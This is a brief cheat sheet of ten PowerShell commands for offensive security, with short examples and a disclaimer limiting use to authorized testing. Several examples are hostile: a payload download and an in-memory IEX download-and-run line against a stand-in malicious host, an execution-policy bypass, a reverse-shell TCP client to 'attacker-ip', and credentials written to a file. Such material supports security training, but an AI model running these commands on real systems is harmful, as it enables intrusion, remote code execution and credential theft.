10 Essential PowerShell Commands for Offensive Security

1. Invoke-WebRequest Download files from a URL. This can be used to pull malicious payloads.

   Invoke-WebRequest -Uri "http://malicious-site.com/payload.exe" -OutFile "payload.exe"

2. Invoke-Expression (IEX) Execute strings or scripts, often used for fileless attacks by downloading and running scripts in memory.

   IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/script.ps1')

3. Set-ExecutionPolicy Change the execution policy to allow running scripts. Useful when bypassing script execution restrictions.

   Set-ExecutionPolicy Bypass -Scope Process -Force

4. Get-WmiObject Gather detailed information about the target machine, including OS details, hardware specs, and processes.

   Get-WmiObject -Class Win32_OperatingSystem

5. Get-Process List all running processes. Often used for identifying running services or processes that can be exploited.

   Get-Process

6. Start-Process Execute a process on the target machine, useful for starting a new payload or running privilege escalation techniques.

   Start-Process "cmd.exe" -ArgumentList "/c whoami"

7. New-Object System.Net.Sockets.TCPClient Create a reverse shell by opening a TCP connection.

   $client = New-Object System.Net.Sockets.TCPClient("attacker-ip", 4444)

8. Get-Content Read the contents of a file. It can be used for exfiltrating sensitive data.

   Get-Content "C:\sensitive-data.txt"

9. Out-File Write data to a file. Useful for saving stolen credentials or logs.

   Get-Credential | Out-File "credentials.txt"

10. Add-Type Inject C# code directly into PowerShell, enabling the use of advanced .NET functionalities or custom code execution.

Add-Type -TypeDefinition @"
public class Exploit {
    public static void Run() {
        // malicious code
    }
}
"@
[Exploit]::Run()

Note: The usage of these commands is for educational and authorized testing purposes only. Always ensure you have permission before engaging in offensive security activities.